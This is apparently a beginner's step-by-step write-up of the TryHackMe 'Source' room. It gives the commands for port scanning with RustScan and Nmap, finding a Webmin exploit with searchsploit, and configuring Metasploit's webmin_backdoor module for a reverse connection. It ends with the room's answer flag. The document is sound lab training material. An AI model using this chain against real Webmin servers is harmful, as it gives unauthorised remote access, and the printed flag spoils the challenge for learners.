# ♦ Day 09
</br>
</br>

## ◙ ***TRYHACKME ROOM***
 </br>
 
# ♦ [SOURCE](https://tryhackme.com/r/room/source) : 
   ⇨ Exploit a recent vulnerability and hack Webmin, a web-based system configuration tool. 
   </br>
   </br>
### ◙ Step-By-Step Guide 



### • 1. First we have to connect it to the TRYHACKME platform for that we have to go to the ***Acess*** in profile and then Download the open vpn file in ***.ovpn*** format.


### • 2. Connect to the Vpn using ***sudo openvpn >file that u downloaded<.ovpn***.

### • 3. Open a Different terminal 'Remember not to close the vpn file till the work is done' and scan the Ip that was generated by THM while starting the   machine and try saving the report by using ***RUSTSCAN***. </br>

  #### ***⇨*** { ***NOTE: Rustscan is much more efficient when we have to scan all the port in a fast manner,rustscan is upgraded version of nmap but it dont give all the dtails of open ports so we acn again use nap to scan open ports after we get the open ports from using rustscan*** }. </br>


## ◙ Difference between Nmap and RustScan.


|    Feature    |                    Nmap                   |               RustScan              |
| ------------- | ----------------------------------------- | ----------------------------------- |
|     Speed     | Slower due to comprehensive scanning      | Very fast, designed for quick scans |
|  Flexibility  | Highly flexible with many options         | Less flexible, focuses on speed     |
|  Programming  | Written in C                              | Written in Rust                     |
|     Usage     | Widely used for detailed network analysis | Best for quick port scanning        |
|  Installation | Available on most systems                 | Requires installation of Rust       | </br>



### • 4. Now Download the rustscan from its orignal website that is in github and here is the [LINK](https://github.com/RustScan/RustScan/releases/download/2.2.3/rustscan-2.2.3-x86_64-linux.tar.xz). Then extract and install and u r ready to use it.

### • 5. Now let's set the room ip in ***/etc/hosts*** so we don't have to type ip everytime. 
    sudo nano /etc/hosts

### • 6. Scan for the open ports in the ip by rustscan and save it as rustscan-sv-sc-source.txt
     sudo rustscan -a source.com -- --script vuln -oN rustscan-sv-sc-source.txt

as we can see it dont give us full details On the Open Ports so we will again use Nmap to scan the open ports we got from the rustscan.

### • 7. Now we will use the Nmap to scan all the known open ports.
    sudo nmap -p(port no.) -sV source.com

### • 8. As we obtainesd ports details from the upper scan now we will search for the spoloits feom search ***searchsploits*** Command so we got that its is a webmin fro mm yupper scan so we will do:
    seachsploit webmin


### • 9. And as it contains "Metasploit" as one of the sploits available so we will use ***msfconsole***.
    msfconsole

### • 10. And now we will search for the sploits for webmin in msfconsole.
    search webmin

### • 11. We hav eto select ***exploit/linux/http/webmin_backdoor*** whichever number it is in.

### • 12. Now we gotta see what informations are required to be filed to usee this sploit for tht we wioll use:
    show options 

### • 13. Now fill all the required infos
    set RHOSTS >the ip that was given by the room<

    set LHOST >the ip of ur vpn/tun0<

    set LPORT >the port u wanna use for this operation(tht port should be free/not alredy in use)<
  
  Also set SSL to true and AutoCheck false
  
    set SSL true 

    set AutoCheck false
  
 And BOOOOM! use ***exploit***
     
    exploit


# ♦ ANSWERS :

## ◙ TASK 1 :

Q. User.txt
  ⇨ THM{SUPPLY_CHAIN_COMPROMISE} 
